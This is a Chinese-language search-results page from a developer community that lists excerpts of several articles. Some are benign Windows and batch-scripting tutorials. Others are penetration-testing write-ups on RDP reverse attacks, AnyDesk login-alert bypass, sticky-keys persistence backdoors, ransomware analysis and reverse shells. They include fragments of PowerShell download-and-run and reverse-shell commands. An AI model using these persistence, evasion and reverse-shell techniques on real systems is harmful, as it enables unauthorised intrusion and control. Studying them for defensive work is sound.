首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

内网渗透|基于文件传输 RDP 反向攻击

本节我们就一个问题进行探讨,即如何通过远程桌面服务端反打连接他客户端。...本节我们就来研究如何通过 RDP 反向攻击方式针对这种受限网络设备完成渗透测试。 RDP 反向攻击姿势有不少,本节我们主要针对最简单一个姿势来进行进行讲解,即通过挂载盘符进行 RDP 反向攻击。...但要注意是,只有通过远程登陆用户才可以远程主机中访问 tsclient,其他远程主机上本地登录用户是无论如何也无法访问 tsclient 。...我们思路是,远程主机启动项中写入一个 .bat 脚本(run.bat),当一个客户端用户通过远程桌面连接到这个远程主机时,登陆之后会立即执行这个启动项中 run.bat 脚本。...而攻击者唯一要做就是在其中一台设备发起 RDPInception 攻击,然后,只需静静等待管理员发起 RDP 远程桌面连接请求,其余后续攻击便可由程序自动完成了。

2.8K20

记一次从Jboss到3389远程桌面案例

所有免杀和绕过方式都有时效性,一旦被公布被查杀和拦截也正常(早晚事)。....exe进程,所以就可能会出现由werfaylt.exe弹出下图报错,所以个人建议得到Session后迁移至x64进程,并执行taskkill /f /im werfaylt.exe命令将该进程结束掉...为避免触发异地登录提醒,我们可以利用AnyDesk来进行绕过,将AnyDesk.exe和静默安装批处理文件上传至可读写目录中,然后命令行下执行批处理文件获取连接ID。...注:如果等待时间过长,一直卡着不动获取不到连接ID时可结束当前命令行,重新进入命令执行anydesk --get-id命令来获取连接ID。...ID即可连接到目标主机远程桌面,成功绕过了阿里云主机异地登录提醒。

96930
您找到你想要的搜索结果了吗?
是的
没有找到

Avos Locker 远程访问盒子,甚至安全模式下运行

通常,重新启动到安全模式计算机上会禁用第三方软件,但这些攻击者显然打算继续不受阻碍地远程访问和控制目标机器。 AVOS弹部队部署工具被存储备份服务器指定目录下一个。...攻击者远程运行文件,因此它们永远不会写入目标机器文件系统。 目前尚不清楚以这种方式设置机器——AnyDesk 设置为安全模式下运行——甚至可以由其合法所有远程管理。...在这种情况下,有一个事件日志条目显示正在执行 base64 编码 PowerShell 脚本,结果输出到名为execute.bat文件中,然后运行该文件,最后将其删除。...一个事件日志条目中,有一个端口被设置为目标机器代理记录,这在理论可以帮助攻击者通过代理计算机路由所有命令来隐藏任何横向移动。...上述命令用于迭代和终止管理程序运行任何虚拟机。目前尚不清楚攻击者如何获得启用 ESX Shell 或访问服务器本身所需管理员凭据。

1.3K30

Windows维权之粘滞键项维权

,直接编辑其权限都是灰色,不能修改,有了所有权之后,便可以编辑其权限,这里需要给予自己权限,如下图:之后window下执行以下命令:cd c:\windows\system32move sethc.exe...,可以直接以System权限执行系统命令、创建管理员用户、登录服务等同时,当我们权限维持时,如果留下了粘滞键后门,当用户修改密码后,我们远程连接时可能会出现无法登录情况,这时候上面这种后门进行权限维持就比较有用了...use post/windows/manage/sticky_keysset SESSION 8exploit之后目标主机中连续五次shift即可执行SYSTEM权限命令行,这在RDP远程登录用户密码已被修改情况下很有用...(放大镜Win + U启动再选择)之后目标主机上按5次shift即可触发后门代理(中间会有一个弹窗迅速闪过,用于执行命令,笔者也未捕获到)之后empire中成功反弹后门代理:Powershell粘性键持久性技术是众所周知...1方式类似,Sticky-Keys项目(https://github.com/HanKooR/Sticky-Keys )提供了一个额外选项,把系统控制台给用户,该工具使用较为简单,下载批处理文件之后下目标主机执行即可虽然执行时可能会有一些小错误

25110

粘滞键项权限维持

所有者之前,直接编辑其权限都是灰色,不能修改,有了所有权之后,便可以编辑其权限,这里需要给予自己权限,如下图: ?...同时,当我们权限维持时,如果留下了粘滞键后门,当用户修改密码后,我们远程连接时可能会出现无法登录情况,这时候上面这种后门进行权限维持就比较有用了: 第一种:创建cmd.exe粘滞键,之后登录界面按下...之后目标主机中连续五次shift即可执行SYSTEM权限命令行,这在RDP远程登录用户密码已被修改情况下很有用~ ?...之后目标主机上按5次shift即可触发后门代理(中间会有一个弹窗迅速闪过,用于执行命令,笔者也未捕获到) ? 之后empire中成功反弹后门代理: ?...批处理文件2 与批处理文件1方式类似,Sticky-Keys项目(https://github.com/HanKooR/Sticky-Keys )提供了一个额外选项,把系统控制台给用户,该工具使用较为简单

1.2K20

Windows 使用 Alias,高效办公指南!

1、CMD 具体步骤如下: 1-1 创建一个批处理文件 比如:系统用户目录创建一个批处理文件 alias.bat 1-2 批处理文件中,定义别名 使用关键字「 doskey 」定义别名,$*...:如果 Command Processor 不存在,可以「 Microsoft 项」右键,创建一个项,名称设置为 Command Processor 1-4 重启 CMD 命令窗口并使用 1-...我们只需要使用关键字「 T 」连接多条命令,利用关键字「 * 」作为可变参数即可 比如,下面定义了一个别名,相当于调用了 3 条命令 # 命令1:cd到某个文件夹目录 # 命令2:查看当前目录下所有的文件...open(){ explorer . } 2-3 重启 PowerShell 并使用 为了使编写 Alias 生效,我们需要重启 PowerShell 后再使用 2-4 参数化 定义别名时...实战 | 如何用 Python 统计 Jira 数据并可视化 实战 | 如何用 Python 自动化监控文件夹完成服务部署!

4.1K20

Windows系统网站-KMS

重装系统时候,一个干净安全可信任Windows原版系统镜像是必不可少,不过对于很多人来说,茫茫网络资源库里,想找到一个自己想要东西,却有点困难,搞不好就被盗版 网站骗了,下载了一个流氓系统镜像...开始激活:以 Windows 专业版为例,运行一个管理员权限 CMD 窗口或 PowerShell (管理员),执行以下命令 slmgr -upk slmgr -ipk W269N-WFGWX-YVC9B...切换完成打开管理员权限 CMD 窗口或 PowerShell (管理员) 执行以下命令 #64位软件目录 cd "C:\Program Files\Microsoft Office\Office16"...本文介绍如何使用简单批处理文件快速解决白图标问题。...:所有文件 点击保存, 找到刚才创建批处理文件,双击(或点右键打开)此文件 执行批处理文件时,会闪下屏,重启桌面管理程序,此过程中若有杀毒软件弹出拦截提示,务必同意运行,否则批处理重新图标缓存将失败

6.4K60

运维必学 | 初识介绍-从零开始学Windows批处理(Batch)编程系列教程

作者WeiyiGeek将对Windows BAT批处理编程发布学习系列教程,BAT批处理进行Windows服务器运维中占有举足轻重地位,能非常方便帮助我们操作管理Windows,当然可能有的朋友会说现在在...echo 命令" pause : 运行此句会暂停批处理执行 温馨提示: 运行此命令时会在屏幕显示Press any key to continue...提示,等待用户按任意键后继续 示例1:未加...rem echo 我是注释不执行1 :: echo 我是注释不执行2 == echo 我不是注释要执行 @pause call :调用另一个批处理文件 描述: 使用call命令调用其他批处理文件,如果不用...call而直接调用别的批处理文件,那么执行完那个批处理文件后将无法返回当前文件并执行当前文件后续命令,温馨提示:同一目录可以不加路径。...,批处理中允许以“:XXX”来构建一个标号,然后用GOTO :标号直接来执行标号后,标号用“:字符串”来定义,标号所在行不被执行

49830

深入了解命令提示符(CMD):Windows中强大命令行工具

虽然现代操作系统提供了许多图形化界面和工具,但命令提示符某些场景下仍然具有重要作用。本篇博客中,我们将深入了解命令提示符,介绍其功能和常用命令,以及如何充分利用它来完成各种任务。...通过输入和执行命令,你可以 CMD 窗口中完成各种操作,如文件管理、系统配置、网络命令、进程管理等。...ftp:启动 FTP 客户端,用于与远程 FTP 服务器进行文件传输。 telnet:启动 Telnet 客户端,用于与远程主机建立 Telnet 连接。...然后,通过 CMD 窗口中执行批处理文件,可以自动执行其中命令和操作。...它提供了丰富命令、脚本和功能,使系统管理员能够更高效地管理和配置Windows环境。除了PowerShell,还有一些其他替代品,提供了类似的功能和目的。

10.2K15

看我一招鲜 | BAT转EXE快速生成

Cmd与powerShell几个区别: #速度cmd是打开真的快啊,powershell等待一段时间才能打开。...#cmd所有的windows系统中都带有cmd,但是powershell就低版本系统中就没有了,需要自己安装才可以。...不过powershell不仅可以windows系统中运行,还可以再linux系统和MACOS运行。...理论powershell是比cmd更强大语言,同时Powershell会兼容cmd,但为啥powershell不行不是这个文章重点,重点是如何能把这个.bat文件FTVIEW中让他执行起来。...然后一路根据提示点到最后就可以创建包完成。 最后可以自己指定存放地方得到一个有微软公司生成一个执行exe文件。 最后再通过SE中选择命令去选择生成执行文件。

4.5K30

PS命令之操作系统远程管理及进程服务操作示例

服务器以管理员权限运行启用PowerShell远程访问(配置计算机以没有确认提示情况下接收远程命令) Enable-PSRemoting -Force Enable-PSRemoting -SkipNetworkProfileCheck...192.168.1.254 # 3.客户端机器(需要远程连接被管理机器)运行以下命令以接受被管理机器是受信任 (如果想管理任何机器请设置为*), 运行以下命令必须是管理员权限 PS >...描述: 从Windows PowerShell 3.0开始,您可以等待重新启动完成,然后再运行下一个命令。指定等待超时和查询间隔,并等待重新启动计算机上特定服务可用。...For 参数 : 指定PowerShell可以远程计算机上运行命令。 Timeout 参数 : 指定五分钟等待时间。 Delay 参数 : 每两秒钟查询一次远程计算机,以确定它是否重新启动。...Wait-Process 命令 - 使本地计算机或远程计算机上运行进程等待 Debug-Process 命令 - 调试本地计算机上运行一个或多个进程。

7.1K40

Nanocore等多个远控木马滥用公有云服务传播

脚本执行后,会通过下载服务器下载下一阶段攻击载荷,攻击者将下载服务器部署基于 Azure Windows 服务器或基于 AWS EC2 实例。...第一层 第一层去混淆由 ejv()完成,该函数将混淆数据每个字符保存在数组中,执行算术运算进行解密。...Batch Downloader 脚本中包含一个混淆命令,用以执行 PowerShell 下载攻击载荷,本例中通过 Azure Cloud 服务器 13.78.209.105进行下载。...△ Batch Downloader 示例 VBS Downloader 脚本通过 PowerShell 命令连接到服务器服务器部署 AWS EC2 52.27.15.250。...△ VBScript Downloader 示例 PowerShell Dropper Azure 服务器发现了一个使用 HCrypt 构建 PowerShell 脚本。

1.1K20

四十五.Windows安全基础、注册表和安全常用DOS命令(2)

ipconfig /release:释放ip ipconfig /renew:重新获得ip systeminfo:查看系统信息,主要用来检测是否安装了补丁 arp -a:显示ARP缓存命令,它可以显示电脑所有的...ARP协议是将IP地址映射为MAC地址协议,其协议使用ARP请求及ARP应答报文来实现。 net view:查看局域网内其他计算机名称 telnet:连接远程终端。...批处理文件是DOS命令组合文件,写在批处理文件命令会被逐一执行,后缀名为“.bat”。比如创建一个批处理文件“x.bat”,包含3条DOS命令。 DIR查看已经已经创建成功。...本地C盘批处理文件“x.bat”如果被执行或加载到自启动项,则会执行命令。 可以看到,创建管理员用户“cr”已经存在,后续会执行关机。...---- 三.Powershell Powershell安全领域也是非常重要技能,推荐大家阅读作者两篇前文。

6.5K20

windows系统安全|Windows渗透基础大全

) Windows中加载并执行PowerShell脚本 本地加载并执行PowerShell脚本 远程下载并执行PowerShell脚本 Windows中批处理文件 Windows中快捷键操作 Windows...更多关于PowerShell用法:PowerShell使用浅析 本地加载并执行PowerShell脚本 cmd当前目录下有PowerView.ps1脚本,并执行其中Get-Netdomain模块...\powerview.ps1;Get-NetDomain 远程下载并执行PowerShell脚本 远程下载并执行test.ps1脚本、远程下载PowerView.ps1脚本,并执行其中Get-Netdomain...\powerview.ps1;Get-NetDomain Windows中批处理文件 @echo off 表示在此语句后所有运行命令都不显示命令行本身 echo...,系统也会重新启动该进程 system:该进程是windows页面内存管理进程,它能够确保系统正常启动 system idle process:该进行功能是CPU空闲时发出一个命令使CPU挂起,

1.7K10

工程化能力必备技能,前端 jenkins 自动化部署持续集成

敲下打包命令 等待构建结束,并将资源文件压缩成压缩包复制到桌面 链接部署服务器 找到需要部署站点文件夹 粘贴至目标文件夹并解压 项目多时候,重复操作极大浪费时间。...远程机器添加批处理文件 当配置目标机器为windows系统时,文件会被送到配置远程链接账户所属用户文件夹下。传输完毕后,预留 superDeploy.bat 文件会被执行。...Jenkins就会按照SVN地址拉取代码,并且执行构建命令构建完成后将dist文件夹压缩成压缩包,送到目标服务器并且执行预留在目标服务器批处理文件。...批处理文件将压缩包移动到执行目标目录,处理解压缩动作。一个自动构建和部署过程就完成了。 实际构建时间需要40秒~70秒,但对于手工操作来说要强太多了。...windows与svn总有大量奇奇怪怪问题,搭建过程频频受阻。好不容易搭建好了,依赖却安装不了了,障碍一个一个连续失败了95次之后,第96次终于成功将所有的流程走通。

1.4K11

反弹shell学习总结 - Part 2

将生成test文件复制到python搭建web服务器中,于是有:http://192.168.1.18:9889/test step 3:目标机上执行powershell下载脚本 powershell...目标机上启动一个进程进行DLL注入,可以后续注入更加隐蔽,使用如下命令新建一个名为notepad.exe隐蔽进程: Start-Process c:\windows\system32\notepad.exe...执行run之后,会看到生成powershell命令,复制出来,目标机上执行 powershell.exe -nop -w hidden -c $h=new-object net.webclient;...(2)SSH远程转发 ? 2、 EarthWorm端口转发 EW是一套便携式网络穿透工具,具有SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。.../ew -s ssocksd -l 1080 反弹 SOCKS v5 服务器 这个操作具体分两步: a) 先在一台具有公网 ip 主机A运行以下命令: $ .

1.8K31

从Linux到WindowsPowerShell远程处理

背景资料 偶然发现在我测试中使用PowerShell远程处理作为维护系统远程代码执行主要方法很有用。它是一个内置Windows功能。...幸运是,Redditors找到了Centos使用PowerShell进行NTLM身份验证方法,因此我将他们发现整合到一个简单PowerShell Docker镜像quickbreach /...如何使用从Linux到WindowsPowerShell远程处理 本节将逐步介绍如何从Linux客户端到Windows目标建立远程PowerShell会话。...要完成此操作,请运行以下命令之一:使用通配符允许所有计算机在对此主机进行身份验证时使用NTLM Set-Item WSMan:localhostClientTrustedHosts -Force -Value.../powershell-ntlm 6.现在我们一直等待:使用以下命令进入远程PowerShell会话 - 请注意,您必须指定-Authentication类型: # Grab the creds we

2.1K20

反弹shell | 反弹shell总结

.利用计划任务执行命令反弹shell redis以root权限运行时可以写crontab来执行命令反弹shell 先在自己服务器监听一个端口 nc -lvnp 7999 然后执行命令: root@...1.4.1 写ssh-keygen公钥然后使用私钥登录 利用条件: Redis服务使用ROOT账号启动 服务器开放了SSH服务,而且允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器 操作流程:...,实际一个powershell函数,使用方法类似Netcat。.../Shells/Invoke-PowerShellUdp.ps1');Invoke-PowerShellUdp -Reverse -IPAddress 192.168.1.4 -port 5399 攻击者电脑执行如下命令...python搭建web服务器中,于是有:http://192.168.1.18:9889/test step 3:目标机上执行powershell下载脚本 powershell IEX (New-Object

3.3K21

Windows 使用 PowerShell 来管理另外一台 Windows 机器

但是一些比较底层命令执行来说,可能你需要一些其他工具,这个就是和我们远程到 Linux 主机意思是一样。...简单来说 WinRM 是使用 HTTP 协议,协议端口是:5985。 我们可以通过 WinRM 来 powershell 上到远程计算机上执行相关命令。...可以理解为,就是远程计算机为你开放了一个 powershell 执行环境。这个权限还是非常大。...从上面的图片我们可以看到,我们已经登录到一个一个计算机中环境中,并在本地计算机上使用 powershell 远程计算机上执行命令。...上面的命令需要在服务器和客户端上分别都执行,等于是所有机器都要执行,不管是主动连接还是被连接

1.6K00

如何在 Windows 10创建和运行批处理文件

Windows 10 批处理文件是一种特殊文本文件,通常具有。Bat 扩展,它包含一个或多个命令命令提示符可以理解并依次运行以执行各种操作。...你还可以使用 PowerShell 等其他工具编写更高级脚本。然而,当你需要运行命令来改变设置、自动化例程、启动应用程序或启动网站时,使用带有命令提示符批处理文件一个方便选择。...如何在 Windows 10创建批处理文件 创建批处理(脚本或批处理脚本)文件过程很简单。你只需要一个文本编辑器和一些基本命令行知识。...(您可以不使用“@”情况下使用该命令,但是符号隐藏了正在执行命令以创建一个更清晰返回。) ECHO:屏幕打印任意文本。 PAUSE:执行命令后保持窗口打开。...如何在 Windows 10 运行批处理文件 Windows 10 ,你至少可以用三种方式运行批处理文件。你可以使用文件资源管理器或命令提示符按需运行它。

26K40
领券